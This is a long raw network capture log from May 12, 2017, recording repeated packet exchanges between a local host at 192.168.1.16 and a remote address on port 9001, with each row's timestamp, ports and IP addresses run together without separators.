May 12, 2017 18:55:30.419058084 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419065952 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.419073105 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419085979 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419100046 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419117928 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419131041 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419133902 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.419143915 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419159889 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419171095 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.419173002 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419182062 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419197083 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419205904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419215918 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419224977 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419235945 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419244051 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419255972 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419261932 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.419266939 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419275045 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419287920 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419296980 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419306993 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419317007 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419327021 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419336081 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419347048 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419353008 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.419354916 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419365883 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419378042 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419389009 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419399977 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419409037 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419420004 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419428110 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419429064 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.419439077 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419450045 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419457912 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419470072 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419477940 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419487953 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419497967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419507980 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419516087 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419517040 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.419528961 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419540882 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419548988 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419559956 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419572115 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419579029 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419590950 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419600010 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.419600964 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419610023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419621944 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419631004 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419641018 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419650078 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419660091 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419667959 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419680119 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419687986 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.419691086 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419698954 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419712067 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419761896 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.421216965 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.421931982 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.425349951 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.426613092 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.426635981 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.428644896 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.468453884 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.589046001 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.589071035 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.589091063 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.589178085 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.593723059 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.593738079 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.593775034 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.594613075 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.598225117 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.598249912 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.598284006 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.602161884 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.622354031 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.622380018 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.622442961 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.631658077 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.732489109 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.732641935 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.732652903 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.732671022 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.732685089 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.732709885 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.732791901 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.732801914 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.732860088 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.732873917 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.733428955 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.733448029 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.733458996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.733522892 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.733535051 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.733575106 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.733591080 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.733637094 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.733643055 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.733658075 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.733695984 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.736480951 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.736505032 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.736517906 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.736558914 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.736767054 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.736793995 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.736831903 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.736844063 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.745963097 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.746057034 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.746072054 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.956444979 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.956542969 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.995696068 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.995716095 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.996004105 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.996021986 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.996114969 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.996128082 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.996218920 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.996229887 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.996311903 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.996323109 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.996418953 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.996429920 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.996633053 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.996646881 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.996731997 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.996748924 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.996834040 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.996850014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.996925116 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.996936083 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.997005939 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.997015953 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.997235060 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.997247934 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.997330904 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.997342110 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.997422934 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.997432947 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.997514009 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.997524977 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.997592926 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.997602940 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.997750998 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.997762918 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.997843981 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.997853994 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.997931004 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.997941971 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.998020887 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.998030901 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.998122931 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.998132944 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.998331070 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.998343945 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.998425007 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.998435974 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.998528957 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.998543978 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.998626947 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.998637915 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.998709917 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.998719931 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.998888969 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.998900890 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.319767952 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.474282026 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.474313974 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.474409103 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.474426985 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.478440046 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.478467941 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.478543043 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.478560925 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.478619099 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.478641987 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.478697062 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.478714943 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.480489969 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.482527018 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.606435061 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.606533051 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.606545925 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.623651981 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.623673916 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.623759031 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.623776913 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.624505997 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.624524117 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.624598980 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.624613047 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.624623060 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.624733925 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.625070095 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.625180960 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.625195026 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.625247002 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.625261068 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.626122952 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.626138926 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.626148939 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.626189947 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.626204967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.627756119 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.627773046 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.627829075 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.627841949 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.632896900 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.632915020 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.633001089 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.633023024 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.737189054 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.737313986 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.737340927 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.771531105 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.771554947 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.771678925 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.771698952 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.775589943 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.775616884 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.775700092 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.775706053 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.775721073 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.775733948 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.777224064 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.777242899 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.777348042 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.777370930 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.779856920 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.779877901 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.779978037 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.780000925 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.780214071 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.780234098 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.780309916 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.780328035 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.781330109 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.781348944 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.781542063 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.781563044 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.781685114 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.781701088 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.781860113 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.781874895 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.782495022 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.782511950 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.782583952 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.782604933 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.782660007 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.782679081 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.782752037 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.782769918 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.782972097 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.782989025 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.783060074 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.783077002 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.783405066 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.783416986 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.783432961 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.783529997 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.783548117 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.784583092 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.784600973 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.784766912 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.784823895 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.790182114 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.790203094 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.790379047 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.790417910 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.799530983 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.799631119 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.799674988 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.892815113 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.892838955 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.893022060 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.918726921 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.918761969 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.918771982 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.918843985 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.919399023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.919416904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.919436932 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.919487953 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.919514894 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.919529915 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.919540882 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.919564962 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.919687033 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.919704914 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.919754982 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.919774055 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.922271013 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.922292948 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.922303915 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.922394037 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.923165083 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.923182964 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.923192978 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.923252106 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.923933983 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.923949003 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.924021959 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.924036980 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.924501896 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.924521923 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.924566984 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.924581051 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.925700903 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.925719023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.925736904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.925750971 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.925751925 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.925769091 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.925843000 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.925873995 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.926836967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.926855087 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.926897049 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.926909924 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.927123070 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.927139997 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.927189112 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.927201986 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.930608034 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.930627108 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.930705070 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.930720091 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.932549000 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.932566881 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.932629108 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.932642937 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.933664083 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.933681011 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.933737040 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.933751106 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.934617996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.934638023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.934695959 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.934709072 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.935626984 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.935645103 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.935714960 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.935728073 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.936815023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.936832905 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.936876059 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.936893940 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.936908960 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.937036037 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.937052011 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.937108040 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.937119961 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.940632105 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.940654039 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.940711975 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.940738916 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.941507101 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.941528082 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.941598892 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.941637993 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.943907976 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.943928003 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.943990946 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.944017887 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.946455956 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.946480989 CEST90014919879.137.85.71192.168.1.16
